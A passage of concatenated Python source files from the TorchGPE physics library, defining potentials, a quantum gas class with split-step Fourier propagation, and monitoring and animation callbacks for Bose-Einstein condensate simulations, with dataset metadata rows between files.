total_dynamic_nonlinear_potential = sum(potential.potential_function(
*gas.coordinates, gas.psi, time) for potential in dynamic_nonlinear_potentials)
# Compute the propagator due to all the potentials
return torch.exp(-1j * (total_static_linear_potential + total_static_nonlinear_potential + total_dynamic_linear_potential + total_dynamic_nonlinear_potential) * time_step)
| 7,360 | Python | .py | 111 | 58.396396 | 185 | 0.723899 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,172 | potentials.py | qo-eth_TorchGPE/torchgpe/bec2D/potentials.py | from __future__ import annotations
from typing import Union, Callable
import scipy.constants as spconsts
import numpy as np
import torch
from ..utils.potentials import LinearPotential, NonLinearPotential, any_time_dependent_variable, time_dependent_variable
# --- Linear potentials ---
class Zero(LinearPotential):
"""Zero potential. It is equivalent to not applying any potential at all.
"""
def __init__(self):
super().__init__()
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return torch.zeros_like(X)
class Trap(LinearPotential):
"""Harmonic trapping potential
Args:
omegax (Union[float, Callable]): The frequency along the x axis of the harmonic oscillator. It can be set to be either a constant or a function of time.
omegay (Union[float, Callable]): The frequency along the y axis of the harmonic oscillator. It can be set to be either a constant or a function of time.
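    Examples:
        Illustrative traps with a constant and a time-dependent frequency:
        >>> static_trap = Trap(omegax=400, omegay=400)
        >>> ramped_trap = Trap(omegax=400, omegay=lambda t: 400 + 100 * t)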
"""
def __init__(self, omegax: Union[float, Callable], omegay: Union[float, Callable]):
super().__init__()
self.omegax = omegax
self.omegay = omegay
def on_propagation_begin(self):
self.is_time_dependent = any_time_dependent_variable(
self.omegax, self.omegay)
self._omegax = time_dependent_variable(self.omegax)
self._omegay = time_dependent_variable(self.omegay)
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return 2*(np.pi/self.gas.adim_pulse)**2*((self._omegax(time)*X)**2+(self._omegay(time)*Y)**2)
class Lattice(LinearPotential):
"""Lattice potential
Args:
V0 (Union[float, Callable]): The lattice depth in units of the recoil energy. It can be set to be either a constant or a function of time.
lam (float): The wave length of the lattice.
theta (float): The angle of the lattice in the 2D plane.
        phi (Union[float, Callable]): The phase of the lattice.
        w0 (float): The waist of the Gaussian lattice beam. Defaults to infinity (no transverse envelope).
"""
def __init__(self, V0: Union[float, Callable] = 0, lam: float = 1e-6, theta: float = 0, phi: Union[float, Callable] = 0, w0: float = np.inf):
super().__init__()
self.V0 = V0
self.lam = lam
self.theta = theta
self.phi = phi
self.w0 = w0
def on_propagation_begin(self):
self._lam = self.lam/self.gas.adim_length
self._k = 2*np.pi/self._lam
self._w0 = self.w0/self.gas.adim_length
self._rayleigh = np.pi*self._w0**2/self._lam
self.Er = 0.5 * (spconsts.hbar*self._k /
self.gas.adim_length)**2 / self.gas.mass
self.is_time_dependent = any_time_dependent_variable(
self.V0, self.phi)
self._V0 = time_dependent_variable(self.V0)
self._phi = time_dependent_variable(self.phi)
self._w = self._w0 * \
torch.sqrt(1+(self.gas.X*np.cos(self.theta) +
self.gas.Y*np.sin(self.theta))**2/self._rayleigh**2)
self._R = self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta) + self._rayleigh**2/(self.gas.X*np.cos(self.theta) +
self.gas.Y*np.sin(self.theta))
self._gouy = torch.atan(
(self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta))/self._rayleigh)
self._Epos = lambda time: (1/torch.sqrt(1+(self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta))**2/self._rayleigh**2) * torch.exp(-(-self.gas.X*np.sin(self.theta) + self.gas.Y*np.cos(self.theta))**2/self._w**2) *
(
torch.exp(1j *
(self._k*((self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta)) + (-self.gas.X*np.sin(self.theta) + self.gas.Y*np.cos(self.theta))**2/(2*self._R)) - self._gouy
))
+
torch.exp(-1j *
(self._k*((self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta)) + (-self.gas.X*np.sin(self.theta) + self.gas.Y*np.cos(self.theta))**2/(2*self._R)) - self._gouy + self._phi(time)
))
)
)
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return self._V0(time) * self.Er/(spconsts.hbar*self.gas.adim_pulse) * torch.abs(self._Epos(time))**2/4
class SquareBox(LinearPotential):
"""Square box potential
Args:
V (float): The depth of the box.
D (float): The size of the box.
"""
def __init__(self, V: float, D: float):
super().__init__()
self.V = V
self.D = D
def on_propagation_begin(self):
self._V = self.V/(spconsts.hbar*self.gas.adim_pulse)
self._D = self.D/self.gas.adim_length
self._box = self._V * (1-torch.heaviside(-torch.abs(self.gas.X)+self._D/2, torch.ones_like(self.gas.X)) *
torch.heaviside(-torch.abs(self.gas.Y)+self._D/2, torch.ones_like(self.gas.Y)))
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return self._box
class RoundBox(LinearPotential):
"""Round box potential
Args:
V (float): The depth of the box.
D (float): The diameter of the box.
"""
def __init__(self, V: float, D: float):
super().__init__()
self.V = V
self.D = D
def on_propagation_begin(self):
self._V = self.V/(spconsts.hbar*self.gas.adim_pulse)
self._D = self.D/self.gas.adim_length
self._box = self._V*(1-torch.heaviside((self._D/2)**2 -
self.gas.X**2-self.gas.Y**2, torch.ones_like(self.gas.X)))
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return self._box
# --- Non linear potentials ---
class Contact(NonLinearPotential):
"""Contact interactions potential
Args:
a_s (float): The scattering length in units of the Bohr radius.
a_orth (float): The renormalization parameter for the scattering length to account for the missing third dimension.
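    Examples:
        Illustrative interaction for a scattering length of 100 Bohr radii:
        >>> contact = Contact(a_s=100, a_orth=1e-6)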
"""
def __init__(self, a_s: float = 100, a_orth: float = 1e-6):
super().__init__()
self.a_s = a_s
self.a_orth = a_orth
def on_propagation_begin(self):
self._a_s = self.a_s*spconsts.codata.value("Bohr radius")
self._g = np.sqrt(8*np.pi)*self.gas.N_particles*self._a_s/self.a_orth
def potential_function(self, X: torch.tensor, Y: torch.tensor, psi: torch.tensor, time: float = None):
return self._g*torch.abs(psi)**2
class DispersiveCavity(NonLinearPotential):
"""Transversally pumped dispersive cavity potential
Args:
lattice_depth (Union[float, Callable]): The lattice depth in units of the recoil energy. It can be set to be either a constant or a function of time.
atomic_detuning (float): The atomic frequency detuning with respect to the pump.
cavity_detuning (Union[float, Callable]): The cavity's frequency detuning with respect to the pump. It can be set to be either a constant or a function of time.
cavity_decay (float): The cavity's decay rate.
cavity_coupling (float): The coupling constant between the gas and the cavity.
cavity_angle (float, optional): The angle in the 2D plane of the cavity. Defaults to :math:`0`
pump_angle (float, optional): The angle in the 2D plane of the transversal pump. Defaults to :math:`\\pi/3`
waist (float, optional): the waist of the gaussian beam. Defaults to infinity
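    Examples:
        An illustrative cavity (all values are placeholders, frequencies in Hz):
        >>> cavity = DispersiveCavity(lattice_depth=10, atomic_detuning=-76.6e9,
        ...     cavity_detuning=-15e6, cavity_decay=150e3, cavity_coupling=1.95e6)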
"""
def __init__(self, lattice_depth: Union[float, Callable], atomic_detuning: float, cavity_detuning: Union[float, Callable], cavity_decay: float, cavity_coupling: float, cavity_angle: float = 0, pump_angle: float = np.pi/3, waist: float = np.inf):
super().__init__()
self.lattice_depth = lattice_depth
self.atomic_detuning = atomic_detuning
self.cavity_detuning = cavity_detuning
self.cavity_decay = cavity_decay
self.cavity_coupling = cavity_coupling
self.cavity_angle = cavity_angle
self.pump_angle = pump_angle
self.waist = waist
def on_propagation_begin(self):
self.is_time_dependent = any_time_dependent_variable(
self.cavity_detuning, self.lattice_depth)
self._cavity_detuning = time_dependent_variable(self.cavity_detuning)
self._lattice_depth = time_dependent_variable(self.lattice_depth)
self.g0 = 2*np.pi*self.cavity_coupling
self._atomic_detuning = 2*np.pi*self.atomic_detuning
self.kappa = 2*np.pi*self.cavity_decay
self.freq_d2 = self.gas.d2_pulse
self.lambda_pump = 2*np.pi*spconsts.c / \
(self.freq_d2+self._atomic_detuning)
self.adim_lambda_pump = self.lambda_pump/self.gas.adim_length
self.k_pump = 2*np.pi/self.lambda_pump
self.adim_k_pump = 2*np.pi/self.adim_lambda_pump
self.Er = 0.5 * (spconsts.hbar*self.k_pump)**2 / self.gas.mass
self.U0 = self.g0**2 / self._atomic_detuning
self._adim_waist = self.waist / self.gas.adim_length
R_pump = self.gas.X * \
np.cos(self.pump_angle) + self.gas.Y * np.sin(self.pump_angle)
R_pump_orth = - self.gas.X * \
np.sin(self.pump_angle) + self.gas.Y * np.cos(self.pump_angle)
R_cavity = self.gas.X * \
np.cos(self.cavity_angle) + self.gas.Y * np.sin(self.cavity_angle)
self.COS2 = torch.cos(self.adim_k_pump*R_cavity)**2
self.COS = torch.cos(self.adim_k_pump*R_pump) * \
torch.cos(self.adim_k_pump*R_cavity)
self.c1 = self.gas.N_particles*self.gas.dx*self.gas.dy
self.c3 = self.c1*self.U0
self.eta_prefactor = np.sqrt(self.Er*np.abs(self._atomic_detuning)/spconsts.hbar) * \
self.g0/self._atomic_detuning
self._gaussian_profile = 1/(1+(self.adim_lambda_pump*R_pump/(np.pi*self._adim_waist**2))**2)*torch.exp(
-2 * R_pump_orth**2/(self._adim_waist**2 + (self.adim_lambda_pump*R_pump/(np.pi*self._adim_waist))**2))
self._pump_lattice = np.sign(self._atomic_detuning) * self.Er * torch.cos(
self.adim_k_pump*R_pump)**2 / (spconsts.hbar * self.gas.adim_pulse) * self._gaussian_profile
self._cavity_lattice = self.COS2 * self.U0 / self.gas.adim_pulse
def get_alpha(self, psi: torch.tensor, time: float = None):
"""Return the intracavity field
Args:
psi (torch.tensor): The wave function of the gas
time (float, optional): The time at which to compute the intracavity field. Defaults to None.
Returns:
float: The intracavity field :math:`\\alpha`
"""
        order = self.get_order(psi)
bunching = (torch.abs(psi)**2*self.COS2).sum()
self._cavity_detuning_tilde = 2*np.pi * \
self._cavity_detuning(time)-self.c3*bunching
self.c6 = self.c2-self.c3*bunching
self.eta = np.sqrt(self._lattice_depth(time))*self.eta_prefactor
alpha = self.c1*self.eta*order/self.c6
return alpha
def get_order(self, psi: torch.tensor):
"""Return the order parameter for self-organization
Args:
psi (torch.tensor): The wave function of the gas
Returns:
float: The order parameter
"""
return (torch.abs(psi)**2*self.COS).sum()
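# Usage sketch (placeholder names, not part of the library): with a Gas instance `gas`
# that has been propagated with this potential bound to it as `cavity`, the order
# parameter and intracavity field can be inspected directly, e.g.
# theta = cavity.get_order(gas.psi)
# alpha = cavity.get_alpha(gas.psi, time=0.0)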
def potential_function(self, X: torch.tensor, Y: torch.tensor, psi: torch.tensor, time: float = None):
self.c2 = 2*np.pi*self._cavity_detuning(time)+1j*self.kappa
alpha = self.get_alpha(psi, time)
self.pump_lattice = self._lattice_depth(time) * self._pump_lattice
cavity_lattice = torch.abs(alpha)**2 * self._cavity_lattice
interaction = 2 * torch.sqrt(self._gaussian_profile) / self.gas.adim_pulse * self.eta*self.COS*torch.real(alpha)
return self.pump_lattice + cavity_lattice + interaction | 11,954 | Python | .py | 215 | 46.344186 | 249 | 0.626435 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,173 | gas.py | qo-eth_TorchGPE/torchgpe/bec2D/gas.py | from typing import List, Union
import torch
import numpy as np
from torch.nn.functional import pad
import scipy.constants as spconsts
from .potentials import Zero
from ..utils import normalize_wavefunction, ftn, iftn
from ..utils.elements import elements_dict
from ..utils.potentials import Potential
from ..utils.propagation import imaginary_time_propagation, real_time_propagation
from ..utils.callbacks import Callback
UPDATED_PSI = 0
UPDATED_PSIK = 1
UPDATED_BOTH = 2
class Gas():
"""Quantum gas.
The parameters :py:attr:`N_grid` and :py:attr:`grid_size` specify a computational grid on which the wavefunction
is defined and evolved. :class:`Gas` exposes methods to perform real time propagation and to compute the ground
state's wave function via imaginary time propagation.
Args:
element (str): Optional. The element the gas is made of. Defaults to "87Rb".
N_particles (int): Optional. The number of particles in the gas. Defaults to :math:`10^6`.
N_grid (int): Optional. The number of points on each side of the computational grid. Defaults to :math:`2^8`.
grid_size (float): Optional. The side of the computational grid. Defaults to :math:`10^{-6}`.
device (torch.device or None): Optional. The device on which to store tensors. Defaults to None, meaning that the GPU will be used if available.
float_dtype (:py:attr:`torch.dtype`): Optional. The dtype used to represent floating point numbers. Defaults to :py:attr:`torch.double`.
complex_dtype (:py:attr:`torch.dtype`): Optional. The dtype used to represent complex numbers. Defaults to :py:attr:`torch.complex128`.
adimensionalization_length (float): Optional. The unit of length to be used during the simulations. Defaults to :math:`10^{-6}`.
"""
def __init__(self, element: str = "87Rb", N_particles: int = int(1e6),
N_grid: int = 2**8, grid_size: float = 1e-6,
device: Union[torch.device, None] = None, float_dtype: torch.dtype = torch.double, complex_dtype: torch.dtype = torch.complex128, adimensionalization_length: float = 1e-6) -> None:
#: str: The element the gas is made of.
self.element = element
#: float: The mass of the gas. This is automatically derived from the :py:obj:`~Gas.element` parameter.
self.mass = elements_dict[self.element]["m"]
#: float: The pulse of the :math:`d_2` line. This is automatically derived from the :py:obj:`~Gas.element` parameter.
self.d2_pulse = elements_dict[self.element]["omega d2"]
if (N_particles != int(N_particles)):
raise TypeError("The number of particles must be an integer")
#: int: The number of particles in the gas.
self.N_particles = int(N_particles)
# If no custom device has been specified, use GPU if available
#: torch.device: The device on which to store tensors.
self.device = device if device is not None else torch.device(
"cuda" if torch.cuda.is_available() else "cpu")
#: torch.dtype: The dtype used to represent floating point numbers.
self.float_dtype = float_dtype
#: torch.dtype: The dtype used to represent complex numbers.
self.complex_dtype = complex_dtype
# Adimensionalization length and pulse to do calculations with pure numbers
#: float: Adimensionalization length used to work with pure numbers.
self.adim_length = adimensionalization_length
#: float: Adimensionalization pulse used to work with pure numbers. Its value is :math:`\frac{\hbar}{m l^2}`, where :math:`m` is the mass and :math:`l` the adimensionalization length.
self.adim_pulse = spconsts.hbar/(self.mass*self.adim_length**2)
# Create the grid in adimensionalized units
#: float: The side of the computational grid along the :math:`x` axis in adimensionalized units.
self.grid_size_x = grid_size / self.adim_length
#: float: The side of the computational grid along the :math:`y` axis in adimensionalized units.
self.grid_size_y = grid_size / self.adim_length
#: int: The number of points on each side of the computational grid.
self.N_grid = int(N_grid)
# Grid in real space
# The grid is centered in 0, with a total side length of grid_size/adim_length.
# The total grid is made of N_grid**2 points
#: torch.Tensor: The vector of adimensionalized grid coordinates along the :math:`x` axis.
self.x = torch.linspace(-self.grid_size_x/2, self.grid_size_x/2,
self.N_grid, dtype=self.float_dtype, device=self.device)
#: torch.Tensor: The vector of adimensionalized grid coordinates along the :math:`y` axis.
self.y = torch.linspace(-self.grid_size_y/2, self.grid_size_y/2,
self.N_grid, dtype=self.float_dtype, device=self.device)
#: float: The distance between two consecutive points of the grid along the :math:`x` axis in adimensionalized units.
self.dx = self.x[1]-self.x[0]
#: float: The distance between two consecutive points of the grid along the :math:`y` axis in adimensionalized units.
self.dy = self.y[1]-self.y[0]
coordinates = torch.meshgrid(self.x, self.y, indexing="xy")
#: torch.Tensor: The matrix of :math:`x` coordinates of the grid in adimensionalized units.
self.X = coordinates[0]
#: torch.Tensor: The matrix of :math:`y` coordinates of the grid in adimensionalized units.
self.Y = coordinates[1]
del coordinates
# Grid in momentum space
#: torch.Tensor: The vector of adimensionalized momenta along the :math:`kx` axis.
self.kx = 2*np.pi * torch.fft.fftshift(torch.fft.fftfreq(
self.N_grid + 2 * (self.N_grid//2), self.dx, dtype=self.float_dtype, device=self.device))
#: torch.Tensor: The vector of adimensionalized momenta along the :math:`ky` axis.
self.ky = 2*np.pi * torch.fft.fftshift(torch.fft.fftfreq(
self.N_grid + 2 * (self.N_grid//2), self.dy, dtype=self.float_dtype, device=self.device))
#: float: The distance between two consecutive points of the grid along the :math:`kx` axis in adimensionalized units.
self.dkx = self.kx[1] - self.kx[0]
#: float: The distance between two consecutive points of the grid along the :math:`ky` axis in adimensionalized units.
self.dky = self.ky[1] - self.ky[0]
momenta = torch.meshgrid(self.kx, self.ky, indexing="xy")
#: torch.Tensor: The matrix of :math:`kx` coordinates of the grid in adimensionalized units.
self.Kx = momenta[0]
#: torch.Tensor: The matrix of :math:`ky` coordinates of the grid in adimensionalized units.
self.Ky = momenta[1]
del momenta
# Create the wave functions
self._psi = torch.zeros_like(self.X)
self._psik = torch.zeros_like(self.Kx)
# Specifies the last updated wave function (psi or psik)
self._updated_wavefunction = None
def ground_state(self, potentials: List[Potential] = [], time_step: complex = -1e-6j, N_iterations: int = int(1e3), callbacks: List[Callback] = [], leave_progress_bar=True):
"""Compute the ground state's wave function.
Use the split-step Fourier method with imaginary time propagation (ITP) to compute the ground state's wave function of the gas.
The potentials acting on the system are specified via the :py:attr:`potentials` parameter.
Args:
potentials (List[:class:`~gpe.utils.potentials.Potential`]): Optional. The list of potentials acting on the system. Defaults to [].
time_step (complex): Optional. The time step to be used in the ITP. Defaults to :math:`-10^{-6}\,i`.
N_iterations (int): Optional. The number of steps of ITP to perform. Defaults to :math:`10^{3}`.
callbacks (List[:class:`~gpe.utils.callbacks.Callback`]): Optional. List of callbacks to be evaluated during the evolution. Defaults to [].
leave_progress_bar (bool): Optional. Whether to leave the progress bar on screen after the propagation ends. Defaults to True.
Raises:
Exception: If time dependent potentials are specified
Exception: If the time step is not a purely imaginary number
Exception: If the imaginary part of the time step is not negative
Exception: If neither the wave function in real space nor the one in momentum space has been initialized
"""
# Initial setup of the potentials
for potential in potentials:
potential.set_gas(self)
potential.on_propagation_begin()
# --- Process parameters ---
if any(potential.is_time_dependent for potential in potentials):
raise Exception(
"Time dependent potentials can't be used in imaginary time propagation")
if time_step.real != 0:
raise Exception(
"Imaginary time propagation requires a purely imaginary time step")
if np.imag(time_step) >= 0:
raise Exception(
"The imaginary part of the time step must be negative")
if self._updated_wavefunction is None:
raise Exception(
"The initial wave function must be initialized by either setting the psi or psik attributes")
N_iterations = int(N_iterations)
# Adimensionalize the time_step
adim_time_step = time_step * self.adim_pulse
# If no potential has been specified, use an identically zero one
if len(potentials) == 0:
potentials = [Zero(None)]
# Generate a dictionary of runtime settings for the simulations to be given
# to the callbacks. This list is not complete at the moment
propagation_parameters = {
"potentials": potentials,
"time_step": time_step,
"N_iterations": N_iterations,
}
# Initial setup of the callbacks
for callback in callbacks:
callback.set_gas(self)
callback.set_propagation_params(propagation_parameters)
imaginary_time_propagation(
self, potentials, adim_time_step, N_iterations, callbacks, leave_progress_bar)
def propagate(self, final_time: float, time_step: float = 1e-6, potentials: List[Potential] = [], callbacks: List[Callback] = [], leave_progress_bar=True):
"""Propagate the wave function in real time.
Use the split-step Fourier method with real time propagation (RTP) to propagate the gas wave function to :py:attr:`final_time`.
The potentials acting on the system are specified via the :py:attr:`potentials` parameter.
Note:
The time step is adjusted such that :py:attr:`final_time` is always reached.
Args:
final_time (float): The final time up to which the wave function should be propagated.
time_step (float): Optional. The time step to be used in the RTP. Defaults to :math:`10^{-6}`.
potentials (List[:class:`~gpe.utils.potentials.Potential`]): Optional. The list of potentials acting on the system. Defaults to [].
callbacks (List[:class:`~gpe.utils.callbacks.Callback`]): Optional. List of callbacks to be evaluated during the evolution. Defaults to [].
leave_progress_bar (bool): Optional. Whether to leave the progress bar on screen after the propagation ends. Defaults to True.
Raises:
Exception: If the time step is not a floating point number
Exception: If the time step is not positive
Exception: If neither the wave function in real space nor the one in momentum space has been initialized
"""
# Initial setup of the potentials
for potential in potentials:
potential.set_gas(self)
potential.on_propagation_begin()
# --- Process parameters ---
if not issubclass(type(time_step), (float, )):
raise Exception(
"The provided time step is not a floating point number.")
if time_step <= 0:
raise Exception("Propagation requires a positive time step")
# Adjust the time step such that the final time is always reached
N_iterations = round(final_time/time_step)
time_step = final_time/N_iterations
# Array of times to be passed to the time dependent potentials
times = torch.linspace(0, final_time, N_iterations)
# Adimensionalize the time_step
adim_time_step = time_step * self.adim_pulse
if self._updated_wavefunction is None:
raise Exception(
"The initial wave function must be initialized by setting either the psi or psik attributes")
# If no potential has been specified, use an identically zero one
if len(potentials) == 0:
potentials = [Zero(None)]
# Generate a dictionary of runtime settings for the simulations to be given
# to the callbacks. This list is not complete at the moment
propagation_parameters = {
"potentials": potentials,
"time_step": time_step,
"N_iterations": N_iterations,
"final_time": final_time
}
# Initial setup of the callbacks
for callback in callbacks:
callback.set_gas(self)
callback.set_propagation_params(propagation_parameters)
real_time_propagation(
self, potentials, adim_time_step, times, callbacks, leave_progress_bar)
@property
def density(self):
"""The density of the gas in real space
"""
return torch.abs(self.psi)**2
@property
def densityk(self):
"""The density of the gas in momentum space
"""
return torch.abs(self.psik)**2
@property
def phase(self):
"""The phase (in radians) of the real space wave function
"""
return torch.angle(self.psi)
# --- Manage the update of psi and psik ---
@property
def psi(self):
"""The real space wave function of the gas.
Returns the most updated real space wave function of the gas. If the last updated wave function is the one in momentum space,
computes and stores the real space wave function as its iFFT before returning it.
When a value is assigned to psi, takes care of the normalization before storing it.
"""
# If the last updated wave function is psik, compute psi
if self._updated_wavefunction == UPDATED_PSIK:
# Take into account that psik is padded
self.psi = iftn(self._psik)[
self.N_grid//2:self.N_grid+self.N_grid//2, self.N_grid//2:self.N_grid+self.N_grid//2]
self._updated_wavefunction = UPDATED_BOTH
return self._psi
@psi.setter
def psi(self, value):
if value.dtype != self.complex_dtype:
value = value.type(self.complex_dtype)
self._psi = normalize_wavefunction(value, self.dx, self.dy)
self._updated_wavefunction = UPDATED_PSI
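# Example (sketch): any real- or complex-valued tensor can be assigned, e.g.
# gas.psi = torch.exp(-(gas.X**2 + gas.Y**2))
# the value is cast to complex_dtype and passed through normalize_wavefunction
# before being stored.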
@property
def psik(self):
"""The momentum space wave function of the gas.
Returns the most updated momentum space wave function of the gas. If the last updated wave function is the one in real space,
computes and stores the momentum space wave function as its FFT before returning it.
When a value is assigned to psik, takes care of the normalization before storing it.
"""
# If the last updated wave function is psi, compute psik
if self._updated_wavefunction == UPDATED_PSI:
# Before computing the FFT, pad psi
self.psik = ftn(pad(self._psi, (self.N_grid//2, self.N_grid//2,
self.N_grid//2, self.N_grid//2), mode="constant", value=0))
self._updated_wavefunction = UPDATED_BOTH
return self._psik
@psik.setter
def psik(self, value):
if value.dtype != self.complex_dtype:
value = value.type(self.complex_dtype)
self._psik = normalize_wavefunction(value, self.dkx, self.dky)
self._updated_wavefunction = UPDATED_PSIK
@property
def coordinates(self):
"""The coordinates of the gas
Returns a tuple containing the coordinates of the gas in real space.
"""
return (self.X, self.Y)
@property
def momenta(self):
"""The momenta of the gas
Returns a tuple containing the momenta of the gas in momentum space.
"""
return (self.Kx, self.Ky)
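# Minimal usage sketch (assumed import path, arbitrary values, for illustration only):
# from torchgpe.bec2D.gas import Gas
# gas = Gas("87Rb", N_particles=int(1e5), N_grid=2**7, grid_size=1e-6)
# gas.psi = torch.exp(-(gas.X**2 + gas.Y**2)) # the setter normalizes the state
# gas.ground_state(potentials=[], time_step=-1e-6j, N_iterations=1000)
# gas.propagate(final_time=1e-4, time_step=1e-6, potentials=[])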
| 16,750 | Python | .py | 277 | 50.638989 | 197 | 0.661521 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,174 | callbacks.py | qo-eth_TorchGPE/torchgpe/bec2D/callbacks.py | import torch
import numpy as np
import fcntl
import json
import warnings
import matplotlib.pyplot as plt
import tempfile
from os import path
import ffmpeg
from shutil import rmtree
from abc import ABCMeta
from matplotlib import ticker
from .potentials import DispersiveCavity
from ..utils.potentials import LinearPotential, NonLinearPotential
from ..utils.plotting import pi_tick_formatter
from matplotlib.gridspec import GridSpec
from ..utils import prompt_yes_no, enumerate_chunk
from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable
from tqdm.auto import tqdm
from matplotlib.colors import LogNorm
import multiprocess
import atexit
import signal
import psutil
from ..utils.callbacks import Callback
class CavityMonitor(Callback):
"""Callback monitoring the time dependent parameters of a dispersive cavity and its field.
During the simulation, the values of cavity detuning, pump strength and cavity field are stored. Once the simulation is finished, the saved parameters are accessible via the :py:attr:`gpe.bec2D.callbacks.CavityMonitor.alpha`, :py:attr:`gpe.bec2D.callbacks.CavityMonitor.pump` and :py:attr:`gpe.bec2D.callbacks.CavityMonitor.cavity_detuning` tensors.
Args:
dispersive_cavity (DispersiveCavity): The cavity to be monitored.
save_every (int): Optional. The number of epochs after which the parameters should be saved. Defaults to 1.
"""
def __init__(self, dispersive_cavity: DispersiveCavity, save_every=1) -> None:
super().__init__()
self.save_every = save_every
#: list(float): A list of the pump strengths. It is a list of lists, where each inner list contains the pump strengths for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.pump = []
#: list(float): A list of the cavity detunings. It is a list of lists, where each inner list contains the cavity detunings for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.cavity_detuning = []
#: list(complex): A list of the cavity field amplitudes. It is a list of lists, where each inner list contains the cavity field amplitudes for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.alpha = []
#: list(float): A list of the times at which the parameters were saved. It is a list of lists, where each inner list contains the times for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.times = []
self.cavity = dispersive_cavity
def on_propagation_begin(self):
self.alpha.append([])
self.pump.append([])
self.cavity_detuning.append([])
self.times.append([])
def on_epoch_end(self, epoch):
if epoch % self.save_every != 0:
return
time = epoch*self.propagation_params["time_step"]
self.times[-1].append(time)
alpha = self.cavity.get_alpha(self.gas.psi, time=time)
self.alpha[-1].append(alpha)
self.pump[-1].append(self.cavity._lattice_depth(time))
self.cavity_detuning[-1].append(self.cavity._cavity_detuning(time))
def on_propagation_end(self):
self.alpha[-1] = torch.tensor(self.alpha[-1])
self.pump[-1] = torch.tensor(self.pump[-1])
self.cavity_detuning[-1] = torch.tensor(self.cavity_detuning[-1])
self.times[-1] = torch.tensor(self.times[-1])
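# Usage sketch (placeholder names): assuming `cavity` is a DispersiveCavity and `gas`
# a prepared Gas instance,
# monitor = CavityMonitor(cavity, save_every=10)
# gas.propagate(final_time=1e-3, time_step=1e-6, potentials=[cavity], callbacks=[monitor])
# alpha_trace = monitor.alpha[-1] # field amplitudes recorded during this run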
class Animation(Callback):
"""Callback generating an animation of the propagation of the wavefunction.
Args:
output_file (str): The path where to store the mp4 animation.
save_every (int): Optional. The number of epochs after which a frame of the animation is saved. Defaults to 1.
fps (int): Optional. The number of frames per second of the animation. Defaults to 25.
cores (int): Optional. The number of cores to use for the generation of the images. Defaults to 1.
density (bool): Optional. Whether to plot the real space density. Defaults to True.
phase (bool): Optional. Whether to plot the phase. Defaults to True.
densityk (bool): Optional. Whether to plot the momentum space density. Defaults to False.
potentials (bool): Optional. Whether to plot the potential landscape. Defaults to False.
cavities (list): Optional. A list of :class:`gpe.bec2D.potentials.DispersiveCavity` objects to monitor. Defaults to [].
time_dependent_variables (list): Optional. A list of tuples of the form (label, function) where label is a string and function is a function of time returning a float. The value of the function will be plotted as a function of time. Defaults to [].
"""
def __init__(self, output_file, save_every=1, fps=25, cores=1, density=True, phase=True, densityk=False, potentials=False, cavities=[], time_dependent_variables=[]):
super().__init__()
self.save_every = save_every
self.output_folder = path.dirname(output_file)
self.output_file = output_file
self.fps = fps
self.N_cores = cores
self._plot_density = density
self._plot_phase = phase
self._plot_densityk = densityk
self._plot_potentials = potentials
self._time_dependent_variables = time_dependent_variables
self._tdv_history = [[] for _ in range(len(time_dependent_variables))]
self._cavities = cavities
self._cavities_history = [[] for _ in range(len(cavities))]
self._times = []
if not path.exists(self.output_folder):
raise Exception("The output folder does not exist")
if path.exists(self.output_file):
if not prompt_yes_no("The specified file already exists. Are you sure you want to overwrite it? Y/n", True):
raise Exception("The output file already exists")
N_2d_plots = density + phase + densityk + potentials
self.N_1d_plots = 2*len(cavities) + len(time_dependent_variables)
self.n_cols = 2 if N_2d_plots % 2 == 0 else N_2d_plots
self.n_rows = (int(np.ceil(N_2d_plots/2)) if N_2d_plots %
2 == 0 else 1)+self.N_1d_plots
self._height_ratios = [3]*(self.n_rows-self.N_1d_plots)
self._height_ratios.extend([1]*self.N_1d_plots)
def _register_run(self):
with open(path.join(path.expanduser("~"), ".GPE_animation_cleanup.json"), 'a+') as file:
fcntl.flock(file, fcntl.LOCK_EX) # Acquire exclusive lock
file.seek(0)
try:
existing_data = json.load(file)
except (json.JSONDecodeError, EOFError):
existing_data = {}
warnings.warn("The executions register file does not exist and will be created. If you have previously run the animation callback and the process was interrupted, there might be some leftover temporary folders. Please check the folder /tmp/ and delete any leftover temporary folders manually.")
existing_data.setdefault(str(psutil.Process().pid), []).extend([self.temp_dir])
file.truncate(0)
file.seek(0)
json.dump(existing_data, file)
file.flush()
fcntl.flock(file, fcntl.LOCK_UN) # Release lock
def _deregister_run(self, pid=None, folder=None):
if pid is None:
pid = str(psutil.Process().pid)
with open(path.join(path.expanduser("~"), ".GPE_animation_cleanup.json"), 'a+') as file:
fcntl.flock(file, fcntl.LOCK_EX) # Acquire exclusive lock
file.seek(0)
try:
existing_data = json.load(file)
except (json.JSONDecodeError, EOFError):
existing_data = {}
if pid in existing_data:
if folder is not None:
self.clear_dir(folder)
existing_data[pid] = [f for f in existing_data[pid] if f != folder]
if len(existing_data[pid]) == 0:
del existing_data[pid]
else:
for f in existing_data[pid]:
self.clear_dir(f)
del existing_data[pid]
file.truncate(0)
file.seek(0)
json.dump(existing_data, file)
file.flush()
fcntl.flock(file, fcntl.LOCK_UN) # Release lock
def _clean_leftovers(self):
try:
with open(path.join(path.expanduser("~"), ".GPE_animation_cleanup.json"), "r") as f:
runs = json.load(f)
for key, value in runs.items():
if not psutil.pid_exists(int(key)):
